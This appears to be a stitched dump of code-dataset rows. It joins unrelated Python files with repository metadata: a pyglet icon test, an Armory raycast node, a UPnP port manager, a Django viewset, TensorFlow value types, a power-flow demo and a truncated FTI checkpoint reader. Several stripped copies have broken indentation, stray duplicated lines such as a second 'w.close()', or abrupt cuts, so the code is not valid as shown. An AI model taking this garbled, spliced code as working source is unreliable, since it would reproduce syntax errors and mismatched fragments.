if __name__ == '__main__':
unittest.main()
| 25.384615 | 87 | 0.674747 | #!/usr/bin/env python
'''Test that window icon can be set.
Expected behaviour:
One window will be opened. It will have an icon depicting a yellow
"A".
Close the window or press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: WINDOW_SET_MOUSE_CURSOR.py 717 2007-03-03 07:04:10Z Alex.Holkner $'
import unittest
from pyglet.gl import *
from pyglet import image
from pyglet import window
from pyglet.window import key
from os.path import join, dirname
icon_file = join(dirname(__file__), 'icon1.png')
class WINDOW_SET_ICON(unittest.TestCase):
    """Interactive test: open a window and set its icon from icon1.png."""
    def test_set_icon(self):
        """Open a 200x200 window, apply the icon and pump events until the
        user closes the window (verification of the icon is visual)."""
        self.width, self.height = 200, 200
        self.w = w = window.Window(self.width, self.height)
        w.set_icon(image.load(icon_file))
        glClearColor(1, 1, 1, 1)
        # Redraw and dispatch events until the user closes the window.
        while not w.has_exit:
            glClear(GL_COLOR_BUFFER_BIT)
            w.flip()
            w.dispatch_events()
        w.close()
w.close()
if __name__ == '__main__':
unittest.main()
| 323 | 20 | 49 |
10a5a338a92a7f9288831f9283b572e927bc7fcb | 867 | py | Python | blender/arm/logicnode/object/LN_raycast_object.py | proteanblank/armory | edec5c2c3626cfc16065ccc5cf24e02f03187465 | [
"Zlib"
] | 2 | 2020-04-16T20:32:15.000Z | 2021-12-15T10:50:05.000Z | blender/arm/logicnode/object/LN_raycast_object.py | proteanblank/armory | edec5c2c3626cfc16065ccc5cf24e02f03187465 | [
"Zlib"
] | 1 | 2020-09-13T09:34:57.000Z | 2020-09-13T09:34:57.000Z | blender/arm/logicnode/object/LN_raycast_object.py | proteanblank/armory | edec5c2c3626cfc16065ccc5cf24e02f03187465 | [
"Zlib"
] | 1 | 2019-09-24T14:25:35.000Z | 2019-09-24T14:25:35.000Z | from arm.logicnode.arm_nodes import *
class RaycastObjectNode(ArmLogicTreeNode):
"""it takes an object and returns true or false if the object is touched at screen (x, y) and the (x,y, z) position of that touch if returned"""
bl_idname = 'LNRaycastObjectNode'
bl_label = 'Raycast Object'
arm_section = 'props'
arm_version = 1
| 39.409091 | 148 | 0.675894 | from arm.logicnode.arm_nodes import *
class RaycastObjectNode(ArmLogicTreeNode):
    """Takes an object and returns true or false depending on whether the
    object is touched at screen position (x, y) as seen from the given
    camera, along with the (x, y, z) position of that touch."""
    bl_idname = 'LNRaycastObjectNode'
    bl_label = 'Raycast Object'
    arm_section = 'props'
    arm_version = 1

    def arm_init(self, context):
        # Input sockets, registered in the original declaration order.
        input_sockets = (
            ('ArmNodeSocketAction', 'In'),
            ('ArmNodeSocketObject', 'Object'),
            ('ArmFloatSocket', 'X'),
            ('ArmFloatSocket', 'Y'),
            ('ArmNodeSocketObject', 'Camera'),
        )
        for socket_type, socket_name in input_sockets:
            self.add_input(socket_type, socket_name)
        # Output sockets: pass-through, hit/miss branches, hit location.
        output_sockets = (
            ('ArmNodeSocketAction', 'Out'),
            ('ArmNodeSocketAction', 'True'),
            ('ArmNodeSocketAction', 'False'),
            ('ArmVectorSocket', 'Location'),
        )
        for socket_type, socket_name in output_sockets:
            self.add_output(socket_type, socket_name)
| 492 | 0 | 27 |
d299f91d21993de099da6d5c3ffc6a6c7b0fdbe5 | 3,824 | py | Python | upnpc/client.py | hamsteruser/upnpc_py | c2409ad262ea1fa48c847837d8141bd1851af193 | [
"MIT"
] | null | null | null | upnpc/client.py | hamsteruser/upnpc_py | c2409ad262ea1fa48c847837d8141bd1851af193 | [
"MIT"
] | null | null | null | upnpc/client.py | hamsteruser/upnpc_py | c2409ad262ea1fa48c847837d8141bd1851af193 | [
"MIT"
] | null | null | null | import miniupnpc
import random
import itertools
import ipaddress
if __name__ == "__main__":
    # Smoke test: discover an IGD, map a random port, then clean everything up.
    pm = port_manager()
    print(pm.discover())
    (result, port) = pm.mapport()
    print(result, port)
    print(pm.used_ports())
    print(pm.unmapport(int(port)))
    print(pm.used_ports())
    # BUG FIX: the class has no ``unmap_ports(closeall=...)`` method;
    # the intended call is ``unmap_allports()``, which takes no arguments.
    pm.unmap_allports()
| 35.082569 | 119 | 0.558316 | import miniupnpc
import random
import itertools
import ipaddress
class port_manager():
    """Manage uPnP port mappings through miniupnpc.

    Keeps a pool of candidate external ports (1024-65535); ports known to
    be mapped already (or that failed to map) are removed from the pool.
    """
    def __init__(self):
        '''Initialize a uPnP session and the candidate-port pool.

        Raises ValueError when no uPnP IGD answers on the network.
        '''
        try:
            self.upnp = miniupnpc.UPnP()
            self.discover()
        except Exception as err:
            print(err)
            # chain the original exception so the root cause stays visible
            raise ValueError("uPnP is not running or not properly responding ") from err
        self.available_ports = list(range(1024, 65536))
        # (internal_host, external_port) pairs of mappings seen on the IGD
        self.port_tuples = []
    def port_ban(self, port):
        '''Remove *port* from the candidate pool (no-op if absent).'''
        if port in self.available_ports:
            self.available_ports.remove(port)
    def discover(self) -> tuple:
        '''Probe for a uPnP IGD and return (device_count, external_ip).

        Also validates that the reported LAN address parses as an IP
        (``ipaddress.ip_address`` raises ValueError otherwise).
        '''
        devices = self.upnp.discover()
        self.upnp.selectigd()
        ipaddress.ip_address(self.upnp.lanaddr)
        ext_ip = self.upnp.externalipaddress()
        return (devices, ext_ip)
    def used_ports(self) -> None:
        '''Enumerate existing uPnP mappings; record and ban their ports.'''
        for i in itertools.count(start=0):
            result = self.upnp.getgenericportmapping(i)
            if result is None:  # no more mappings
                break
            print(f"Used port: {result}")
            (port, proto, (internal_host, internal_port), desc, c, d, timelife) = result
            self.port_tuples.append((internal_host, port))
            self.port_ban(port)
    def unmap_allports(self) -> None:
        '''Delete every existing uPnP mapping and return its port to the pool.'''
        while True:
            result = self.upnp.getgenericportmapping(0)
            if result is None:
                break
            print(f"Close the: {result}")
            (port, proto, (internal_host, internal_port), desc, c, d, timelife) = result
            self.unmapport(port=port, proto=proto)
            if int(port) not in self.available_ports:
                self.available_ports.append(int(port))
    def mapport(self, port=None, proto="TCP", tries=20) -> tuple:
        '''Map *port* (or up to *tries* random candidates) to this host.

        Returns (success, port_str); port_str is "-1" when mapping failed.
        '''
        self.used_ports()
        if port:
            _port = port
            if _port not in self.available_ports:
                # port already mapped: free it first if it belongs to another host
                for port_tuple in self.port_tuples:
                    if port_tuple[1] == _port and self.upnp.lanaddr != port_tuple[0]:
                        self.unmapport(_port)
            try:
                result = self.upnp.addportmapping(int(_port), proto, self.upnp.lanaddr, int(_port), str(_port), '')
            except Exception:
                result = False
                print(f"Mapping is unsuccessful. Tried port: {_port}")
                _port = "-1"
        else:
            for i in range(tries):
                _port = random.choice(self.available_ports)
                try:
                    result = self.upnp.addportmapping(int(_port), proto, self.upnp.lanaddr, int(_port), str(_port), '')
                    break
                except Exception:
                    self.port_ban(_port)
                    result = False
                    print(f"Mapping is unsuccessful. Tried port: {_port}")
                    _port = "-1"
        self.port_ban(_port)
        return (result, str(_port))
    def unmapport(self, port: int, proto="TCP") -> bool:
        '''Delete the mapping for *port*; always return the port to the pool.'''
        try:
            result = self.upnp.deleteportmapping(int(port), proto)
        except Exception:
            result = False
        finally:
            if int(port) not in self.available_ports:
                self.available_ports.append(int(port))
        return result
if __name__ == "__main__":
    # Smoke test: discover an IGD, map a random port, then clean everything up.
    pm = port_manager()
    print(pm.discover())
    (result, port) = pm.mapport()
    print(result, port)
    print(pm.used_ports())
    print(pm.unmapport(int(port)))
    print(pm.used_ports())
    # BUG FIX: the class has no ``unmap_ports(closeall=...)`` method;
    # the intended call is ``unmap_allports()``, which takes no arguments.
    pm.unmap_allports()
| 432 | 3,038 | 23 |
6ec87ca6e40ae1af7ac430c629c1de5301101e79 | 315 | py | Python | mysite/article/views.py | ismailtimo29/e-olymp-clone | 900b8eb596d893642b493c12c09e248d86d72a85 | [
"Unlicense"
] | 1 | 2021-03-03T22:25:23.000Z | 2021-03-03T22:25:23.000Z | mysite/article/views.py | akhadov11/e-olymp-clone | 900b8eb596d893642b493c12c09e248d86d72a85 | [
"Unlicense"
] | null | null | null | mysite/article/views.py | akhadov11/e-olymp-clone | 900b8eb596d893642b493c12c09e248d86d72a85 | [
"Unlicense"
] | null | null | null | from django.shortcuts import render
from rest_framework import viewsets
from .models import Item
from .serializers import ItemSerializer
| 26.25 | 57 | 0.8 | from django.shortcuts import render
from rest_framework import viewsets
from .models import Item
from .serializers import ItemSerializer
class ItemViewSet(viewsets.ModelViewSet):
    """CRUD API endpoints for Item objects, newest first.

    BUG FIX: the viewset previously also inherited from ItemSerializer.
    In DRF a serializer is attached via ``serializer_class``, never used
    as a base class of the viewset.
    """
    permission_classes = []  # NOTE(review): no permissions => open access; confirm intended
    serializer_class = ItemSerializer
    queryset = Item.objects.order_by('-post_time')
| 0 | 153 | 23 |
22d8500af8da68aaa57954193c1fa5124901be5b | 408 | py | Python | plugins/dbnd-tensorflow/src/dbnd_tensorflow/marshalling/tensorflow_values.py | busunkim96/dbnd | 0191fdcd4c4fbd35006f1026d1a55b2abab9097b | [
"Apache-2.0"
] | 224 | 2020-01-02T10:46:37.000Z | 2022-03-02T13:54:08.000Z | plugins/dbnd-tensorflow/src/dbnd_tensorflow/marshalling/tensorflow_values.py | busunkim96/dbnd | 0191fdcd4c4fbd35006f1026d1a55b2abab9097b | [
"Apache-2.0"
] | 16 | 2020-03-11T09:37:58.000Z | 2022-01-26T10:22:08.000Z | plugins/dbnd-tensorflow/src/dbnd_tensorflow/marshalling/tensorflow_values.py | busunkim96/dbnd | 0191fdcd4c4fbd35006f1026d1a55b2abab9097b | [
"Apache-2.0"
] | 24 | 2020-03-24T13:53:50.000Z | 2022-03-22T11:55:18.000Z | from tensorflow.keras import models
from tensorflow.keras.callbacks import History
from targets.values.builtins_values import DataValueType
| 24 | 56 | 0.781863 | from tensorflow.keras import models
from tensorflow.keras.callbacks import History
from targets.values.builtins_values import DataValueType
class TensorflowModelValueType(DataValueType):
    """DBND value-type descriptor for ``tensorflow.keras`` ``Model`` objects."""
    type = models.Model
    type_str = "Model"
    config_name = "tensorflow_model"
class TensorflowHistoryValueType(DataValueType):
    """DBND value-type descriptor for Keras training ``History`` objects."""
    type = History
    type_str = "History"
    config_name = "tensorflow_history"
| 0 | 219 | 46 |
86b06fba764b1a4406ad0f6948dbaa2789f40664 | 8,989 | py | Python | python/stepspy-current/demo/demo_powerflow.py | changgang/steps | 9b8ea474581885129d1c1a1c3ad40bc8058a7e0a | [
"MIT"
] | 29 | 2019-10-30T07:04:10.000Z | 2022-02-22T06:34:32.000Z | python/stepspy-current/demo/demo_powerflow.py | cuihantao/steps | 60327bf42299cb7117ed5907a931583d7cdf590d | [
"MIT"
] | 1 | 2021-09-25T15:29:59.000Z | 2022-01-05T14:04:18.000Z | python/stepspy-current/demo/demo_powerflow.py | changgang/steps | 9b8ea474581885129d1c1a1c3ad40bc8058a7e0a | [
"MIT"
] | 8 | 2019-12-20T16:13:46.000Z | 2022-03-20T14:58:23.000Z | #coding = utf-8
'''
Here is a demo of showing how to solve powerflow with stepspy.
Changgang Li, 2019/08/25
'''
from stepspy import STEPS # import the class 'STEPS'
simulator = STEPS(is_default=True) # create a STEPS simulator instance
simulator.info()
powerflow_data_file = 'IEEE9.raw' # file name of powerflow data. Use absolute path if necessary
powerflow_data_type = 'PSS/E' # powerflow data type. Currently, use 'PSS/E' only
simulator.load_powerflow_data(powerflow_data_file, powerflow_data_type) # load powerflow data into the simulator
data_type = 'D' # if you want to set or get double data, set data_type as 'F' or 'D'.
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW' # the data name in the powerflow solver of the simulator
# the data_type and data_name should be consistent. make sure the data_type is correct.
# If the data is double, use 'F' or 'D'. If the data is integer, use 'I'. If the data is boolean, use 'B'. If the data is string, use 'S'
'''
(1) when data_type is 'D' or 'F' you can set/get the following data
'MAX ACTIVE POWER IMBALANCE IN MW': maximum allowed active power mismatch at each bus, in MW. This is the powerflow convergence threshold of P equations.
'MAX REACTIVE POWER IMBALANCE IN MVAR': maximum allowed reactive power mismatch at each bus, in MVar. This is the powerflow convergence threshold of Q equations.
'ITERATION ACCELERATOR': acceleration factor for iteration. by default it is 1.0. if >1.0, then the powerflow solver is accelerated. if <1.0, the powerflow solver is decellerated.
(2) when data_type is 'I', you can set/get the following data
'MAX ITERATION': maximum iteration count allowed for solving powerflow. If set as 1, you can get the solution step by step.
(3)when data_type is 'B', you can set/get the following data
'FLAT START LOGIC': if true, powerflow will be solved with unity voltage profile (1.0pu, 0.0deg), if false, poewrflow will be solved from the current voltage profile.
'''
# here goes get and set maximum active power imbalance in MW
data_type = 'D'
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW'
P_error_MW = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum reactive power imbalance in MVAR
data_type = 'D'
data_name = 'MAX REACTIVE POWER IMBALANCE IN MVAR'
Q_error_MVar = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum iteration
data_type = 'I'
data_name = 'MAX ITERATION'
Iter_max = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 50
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set flat start logic
data_type = 'B'
data_name = 'FLAT START LOGIC'
flat_flag = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# now assuming that maximum active and reactive power imbalance are already set.
# show how to solve powerflow
# solve powerflow with flat start logic disabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # use 'NR' for Newton-Raphson solution, use 'PQ' for PQ decoupled solution
# solve powerflow with flat start logic enabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('PQ')
# if you want to solve powerflow step by step to get the solution process,
# set MAX ITERATION to 1, solve once with flat start enabled, then disable
# flat start and keep solving until the case converges
data_type = 'I'
data_name = 'MAX ITERATION'
value = 1
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # first solve it with flat start enabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value) # from now on, disable flat start
while not simulator.is_powerflow_converged(): # use is_powerflow_converged() to check if powerflow is converged
    simulator.solve_powerflow('NR')
    simulator.save_jacobian_matrix('jacobian.txt') # if you are solving with NR method, you can get jacobian matrix of each iteration in the file
# once powerflow is converged, you can export powerflow result to file
powerflow_result_file = 'pf_result.txt'
simulator.save_powerflow_result(powerflow_result_file) # you can check the file's contents
# you can get power loss of a solved powerflow case
ploss_MW = simulator.get_powerflow_loss() # in MW
print('Loss is:', ploss_MW)
# if you want to get the voltage of each bus, you can try the following codes
buses = simulator.get_all_buses()
for bus in buses:
    bus_name = simulator.get_bus_data(bus, 'S', 'Name')
    voltage = simulator.get_bus_data(bus, 'D', 'Voltage in PU')
    angle = simulator.get_bus_data(bus, 'D', 'Angle in deg')
    print(bus, bus_name, voltage, angle)
# if you want to get the generation of each generator, you can try the following codes
generators = simulator.get_generators_at_bus(0) # 0 indicates all generators will be returned
for generator in generators:
    P = simulator.get_generator_data(generator, 'D', 'PGEN_MW')
    Q = simulator.get_generator_data(generator, 'D', 'QGEN_MVAR')
    print(generator, P, Q)
# if you want to get the load of each load, you can try the following codes
loads = simulator.get_loads_at_bus(0) # 0 indicates all loads will be returned
for load in loads:
    P = simulator.get_load_data(load, 'D', 'P_MW')
    Q = simulator.get_load_data(load, 'D', 'Q_MVAR')
    print(load, P, Q)
# if you want to get the power of each line, you can try the following codes
lines = simulator.get_lines_at_bus(0) # 0 indicates all lines will be returned
for line in lines:
    bus_send = simulator.get_line_data(line, 'I', 'BUS_SEND') # get the bus number of sending side
    bus_recv = simulator.get_line_data(line, 'I', 'BUS_RECV') # get the bus number of receiving side
    Psend = simulator.get_line_data(line, 'D', 'PSEND_MW') # active power at sending side
    Qsend = simulator.get_line_data(line, 'D', 'QSEND_MVAR') # reactive power at sending side
    Precv = simulator.get_line_data(line, 'D', 'PRECV_MW') # active power at receiving side
    Qrecv = simulator.get_line_data(line, 'D', 'QRECV_MVAR') # reactive power at receiving side
    print(line, bus_send, (Psend, Qsend), bus_recv, (Precv, Qrecv))
# if you want to get the power of each transformer, you can try the following codes
transformers = simulator.get_transformers_at_bus(0) # 0 indicates all transformers will be returned
for transformer in transformers:
    bus_pri = simulator.get_transformer_data(transformer, 'I', 'Primary', 'BUS') # get the bus number of primary side
    bus_sec = simulator.get_transformer_data(transformer, 'I', 'Secondary', 'BUS') # get the bus number of secondary side
    P_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'P_MW') # active power at primary side
    Q_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'Q_MVAR') # reactive power at primary side
    P_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'P_MW') # active power at secondary side
    Q_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'Q_MVAR') # reactive power at secondary side
    print(transformer, bus_pri, (P_pri, Q_pri), bus_sec, (P_sec, Q_sec))
# if you want to change generation of each generator, try the following codes
generator = (2,'1') # generator bus, and generator ID, check generator line of raw file
simulator.set_generator_data(generator, 'D', 'PGEN_MW', 50.0) # remember, only P of generator at bus of type 2 can be changed
data_type = 'I'
data_name = 'MAX ITERATION'
value = 10
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR')
newfile = "IEEE9.new.raw"
file_type = "PSS/E"
# pick one export mode; only the last assignment below takes effect
export_mode = 0 # keep as original
export_mode = 1 # order with bus number
export_mode = 2 # order with bus name
export_mode = 3 # order for dynamic simulation
simulator.save_powerflow_data(newfile, file_type, export_mode)
simulator.build_network_Y_matrix()
simulator.save_network_Y_matrix('ymatrix_pf.csv')
simulator.build_decoupled_network_B_matrix()
simulator.save_decoupled_network_B_matrix('bmatrix_pf.csv')
simulator.build_dc_network_B_matrix()
simulator.save_dc_network_B_matrix('bmatrix_dc_pf.csv')
simulator.build_network_Z_matrix()
simulator.save_network_Z_matrix('zmatrix_pf.csv') | 45.39899 | 180 | 0.766047 | #coding = utf-8
'''
Here is a demo of showing how to solve powerflow with stepspy.
Changgang Li, 2019/08/25
'''
from stepspy import STEPS # import the class 'STEPS'
simulator = STEPS(is_default=True) # create a STEPS simulator instance
simulator.info()
powerflow_data_file = 'IEEE9.raw' # file name of powerflow data. Use absolute path if necessary
powerflow_data_type = 'PSS/E' # powerflow data type. Currently, use 'PSS/E' only
simulator.load_powerflow_data(powerflow_data_file, powerflow_data_type) # load powerflow data into the simulator
data_type = 'D' # if you want to set or get double data, set data_type as 'F' or 'D'.
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW' # the data name in the powerflow solver of the simulator
# the data_type and data_name should be consistent. make sure the data_type is correct.
# If the data is double, use 'F' or 'D'. If the data is integer, use 'I'. If the data is boolean, use 'B'. If the data is string, use 'S'
'''
(1) when data_type is 'D' or 'F' you can set/get the following data
'MAX ACTIVE POWER IMBALANCE IN MW': maximum allowed active power mismatch at each bus, in MW. This is the powerflow convergence threshold of P equations.
'MAX REACTIVE POWER IMBALANCE IN MVAR': maximum allowed reactive power mismatch at each bus, in MVar. This is the powerflow convergence threshold of Q equations.
'ITERATION ACCELERATOR': acceleration factor for iteration. by default it is 1.0. if >1.0, then the powerflow solver is accelerated. if <1.0, the powerflow solver is decellerated.
(2) when data_type is 'I', you can set/get the following data
'MAX ITERATION': maximum iteration count allowed for solving powerflow. If set as 1, you can get the solution step by step.
(3)when data_type is 'B', you can set/get the following data
'FLAT START LOGIC': if true, powerflow will be solved with unity voltage profile (1.0pu, 0.0deg), if false, poewrflow will be solved from the current voltage profile.
'''
# here goes get and set maximum active power imbalance in MW
data_type = 'D'
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW'
P_error_MW = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum reactive power imbalance in MVAR
data_type = 'D'
data_name = 'MAX REACTIVE POWER IMBALANCE IN MVAR'
Q_error_MVar = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum iteration
data_type = 'I'
data_name = 'MAX ITERATION'
Iter_max = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 50
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set flat start logic
data_type = 'B'
data_name = 'FLAT START LOGIC'
flat_flag = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# now assuming that maximum active and reactive power imbalance are already set.
# show how to solve powerflow
# solve powerflow with flat start logic disabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # use 'NR' for Newton-Raphson solution, use 'PQ' for PQ decoupled solution
# solve powerflow with flat start logic enabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('PQ')
# if you want to solve powerflow step by step to get the solution process,
# set MAX ITERATION to 1, solve once with flat start enabled, then disable
# flat start and keep solving until the case converges
data_type = 'I'
data_name = 'MAX ITERATION'
value = 1
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # first solve it with flat start enabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value) # from now on, disable flat start
while not simulator.is_powerflow_converged(): # use is_powerflow_converged() to check if powerflow is converged
    simulator.solve_powerflow('NR')
    simulator.save_jacobian_matrix('jacobian.txt') # if you are solving with NR method, you can get jacobian matrix of each iteration in the file
# once powerflow is converged, you can export powerflow result to file
powerflow_result_file = 'pf_result.txt'
simulator.save_powerflow_result(powerflow_result_file) # you can check the file's contents
# you can get power loss of a solved powerflow case
ploss_MW = simulator.get_powerflow_loss() # in MW
print('Loss is:', ploss_MW)
# if you want to get the voltage of each bus, you can try the following codes
buses = simulator.get_all_buses()
for bus in buses:
    bus_name = simulator.get_bus_data(bus, 'S', 'Name')
    voltage = simulator.get_bus_data(bus, 'D', 'Voltage in PU')
    angle = simulator.get_bus_data(bus, 'D', 'Angle in deg')
    print(bus, bus_name, voltage, angle)
# if you want to get the generation of each generator, you can try the following codes
generators = simulator.get_generators_at_bus(0) # 0 indicates all generators will be returned
for generator in generators:
    P = simulator.get_generator_data(generator, 'D', 'PGEN_MW')
    Q = simulator.get_generator_data(generator, 'D', 'QGEN_MVAR')
    print(generator, P, Q)
# if you want to get the load of each load, you can try the following codes
loads = simulator.get_loads_at_bus(0) # 0 indicates all loads will be returned
for load in loads:
    P = simulator.get_load_data(load, 'D', 'P_MW')
    Q = simulator.get_load_data(load, 'D', 'Q_MVAR')
    print(load, P, Q)
# if you want to get the power of each line, you can try the following codes
lines = simulator.get_lines_at_bus(0) # 0 indicates all lines will be returned
for line in lines:
    bus_send = simulator.get_line_data(line, 'I', 'BUS_SEND') # get the bus number of sending side
    bus_recv = simulator.get_line_data(line, 'I', 'BUS_RECV') # get the bus number of receiving side
    Psend = simulator.get_line_data(line, 'D', 'PSEND_MW') # active power at sending side
    Qsend = simulator.get_line_data(line, 'D', 'QSEND_MVAR') # reactive power at sending side
    Precv = simulator.get_line_data(line, 'D', 'PRECV_MW') # active power at receiving side
    Qrecv = simulator.get_line_data(line, 'D', 'QRECV_MVAR') # reactive power at receiving side
    print(line, bus_send, (Psend, Qsend), bus_recv, (Precv, Qrecv))
# if you want to get the power of each transformer, you can try the following codes
transformers = simulator.get_transformers_at_bus(0) # 0 indicates all transformers will be returned
for transformer in transformers:
    bus_pri = simulator.get_transformer_data(transformer, 'I', 'Primary', 'BUS') # get the bus number of primary side
    bus_sec = simulator.get_transformer_data(transformer, 'I', 'Secondary', 'BUS') # get the bus number of secondary side
    P_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'P_MW') # active power at primary side
    Q_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'Q_MVAR') # reactive power at primary side
    P_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'P_MW') # active power at secondary side
    Q_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'Q_MVAR') # reactive power at secondary side
    print(transformer, bus_pri, (P_pri, Q_pri), bus_sec, (P_sec, Q_sec))
# if you want to change generation of each generator, try the following codes
generator = (2,'1') # generator bus, and generator ID, check generator line of raw file
simulator.set_generator_data(generator, 'D', 'PGEN_MW', 50.0) # remember, only P of generator at bus of type 2 can be changed
data_type = 'I'
data_name = 'MAX ITERATION'
value = 10
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR')
newfile = "IEEE9.new.raw"
file_type = "PSS/E"
# pick one export mode; only the last assignment below takes effect
export_mode = 0 # keep as original
export_mode = 1 # order with bus number
export_mode = 2 # order with bus name
export_mode = 3 # order for dynamic simulation
simulator.save_powerflow_data(newfile, file_type, export_mode)
simulator.build_network_Y_matrix()
simulator.save_network_Y_matrix('ymatrix_pf.csv')
simulator.build_decoupled_network_B_matrix()
simulator.save_decoupled_network_B_matrix('bmatrix_pf.csv')
simulator.build_dc_network_B_matrix()
simulator.save_dc_network_B_matrix('bmatrix_dc_pf.csv')
simulator.build_network_Z_matrix()
simulator.save_network_Z_matrix('zmatrix_pf.csv') | 0 | 0 | 0 |
c62690b142f347c026178eead428488587719c22 | 9,918 | py | Python | scripts/ckpt_processor/read_fti_ckpts.py | Knoxort/fti | c784a535aae17ec4df28d025b1d589bd6a71948d | [
"BSD-3-Clause"
] | 34 | 2015-03-16T03:04:37.000Z | 2022-02-28T19:59:57.000Z | scripts/ckpt_processor/read_fti_ckpts.py | Knoxort/fti | c784a535aae17ec4df28d025b1d589bd6a71948d | [
"BSD-3-Clause"
] | 155 | 2015-12-07T23:12:16.000Z | 2022-01-15T19:14:34.000Z | scripts/ckpt_processor/read_fti_ckpts.py | Knoxort/fti | c784a535aae17ec4df28d025b1d589bd6a71948d | [
"BSD-3-Clause"
] | 29 | 2015-03-20T02:16:35.000Z | 2021-11-11T16:10:17.000Z | # This module initiates the checkpoint
# processing of FTI files.
import os
import glob
import os.path
import time
from fnmatch import fnmatch
import configparser
import posix_read_ckpts
import subprocess
import sys
# variables used for input validation
fti_levels = (1, 2, 3, 4)  # valid FTI checkpoint levels
output_formats = ('CSV', 'HDF5', 'data')  # supported output formats
# runtime variables of FTI (ckpt and meta)
config_file = ""  # path of the FTI configuration file
ckpt_dir = ""  # ckpt_dir entry from the config (may be relative)
meta_dir = ""  # meta_dir entry from the config (may be relative)
global_dir = ""  # glbl_dir entry from the config (global/PFS checkpoints)
group_size = 0  # group_size entry from the config
nbHeads = 0  # head entry from the config (FTI head processes per node)
nodeSize = 0  # node_size entry from the config (processes per node)
totalRanks = 0  # total number of ranks (needed for MPI-IO level-4 recovery)
ioMode = 0  # ckpt_io entry from the config (read as a string)
ckpt_abs_path = ""  # absolute checkpoint directory, set by process_fti_paths()
meta_abs_path = ""  # absolute metadata directory, set by process_fti_paths()
execution_id = ""  # exec_id entry from the config
level_meta_dir = ""  # not referenced in this module — presumably legacy; TODO confirm
level_dir = ""  # '/lX/' subdirectory of the selected level, set by process_level()
# This function reads the config_file
# and sets FTI parameters
# This function processes FTI's files
# given config_file and set the absolute
# paths of meta files and ckpt files
# This function returns the path of the
# ckpt corresponding to rank_id
# This function is called if io=2 and level=4
# it recovers the file from l4 directory in mpiio format
# to tmp/file in posix format
# This function returns the path of the
# meta corresponding to the ckpt_file
# note: for now it works with level 1
# This function sets FTI's files paths
# depending on the level where the ckpt is stored
# This function compares ckpt directories
# and returns the level to which the last ckpt was stored
# API to read the checkpoints given config and rank
# def read_checkpoints(config_file, rank_id, level=None, output=None):
| 31.993548 | 109 | 0.619681 | # This module initiates the checkpoint
# processing of FTI files.
import os
import glob
import os.path
import time
from fnmatch import fnmatch
import configparser
import posix_read_ckpts
import subprocess
import sys
# variables used for input validation
fti_levels = (1, 2, 3, 4)  # valid FTI checkpoint levels
output_formats = ('CSV', 'HDF5', 'data')  # supported output formats
# runtime variables of FTI (ckpt and meta)
config_file = ""  # path of the FTI configuration file
ckpt_dir = ""  # ckpt_dir entry from the config (may be relative)
meta_dir = ""  # meta_dir entry from the config (may be relative)
global_dir = ""  # glbl_dir entry from the config (global/PFS checkpoints)
group_size = 0  # group_size entry from the config
nbHeads = 0  # head entry from the config (FTI head processes per node)
nodeSize = 0  # node_size entry from the config (processes per node)
totalRanks = 0  # total number of ranks (needed for MPI-IO level-4 recovery)
ioMode = 0  # ckpt_io entry from the config (read as a string)
ckpt_abs_path = ""  # absolute checkpoint directory, set by process_fti_paths()
meta_abs_path = ""  # absolute metadata directory, set by process_fti_paths()
execution_id = ""  # exec_id entry from the config
level_meta_dir = ""  # not referenced in this module — presumably legacy; TODO confirm
